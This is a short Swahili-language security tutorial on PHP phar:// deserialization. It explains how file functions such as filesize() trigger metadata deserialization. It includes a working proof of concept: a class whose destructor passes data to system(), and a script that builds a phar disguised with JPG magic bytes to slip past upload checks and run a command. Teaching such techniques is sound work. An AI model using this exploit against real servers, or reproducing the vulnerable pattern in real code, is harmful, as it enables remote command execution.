phar:// deserialization

Reading time: 3 minutes

Phar files (PHP Archive) files zina metadata katika muundo wa serialized, hivyo, wakati zinapochambuliwa, hii metadata inakuwa deserialized na unaweza kujaribu kutumia udhaifu wa deserialization ndani ya PHP code.

Jambo bora kuhusu sifa hii ni kwamba deserialization hii itatokea hata kwa kutumia kazi za PHP ambazo hazifanyi eval PHP code kama file_get_contents(), fopen(), file() au file_exists(), md5_file(), filemtime() au filesize().

Hivyo, fikiria hali ambapo unaweza kufanya PHP web ipate ukubwa wa faili isiyo na mipaka kwa kutumia phar:// protokali, na ndani ya code unapata class inayofanana na ifuatayo:

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path

Unaweza kuunda faili la phar ambalo linapopakuliwa litafanya kudhulumu darasa hili ili kutekeleza amri zisizo na mipaka kwa kitu kama:

<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

Kumbuka jinsi magic bytes za JPG (\xff\xd8\xff) zinavyoongezwa mwanzoni mwa faili la phar ili kuepuka uwezekano wa kupakia vikwazo.
Tengeneza faili la test.phar kwa:

php --define phar.readonly=0 create_phar.php

Na utekeleze amri ya whoami ukitumia msimbo ulio hatarini kwa:

php vuln.php

Marejeleo

https://blog.ripstech.com/2018/new-php-exploitation-technique/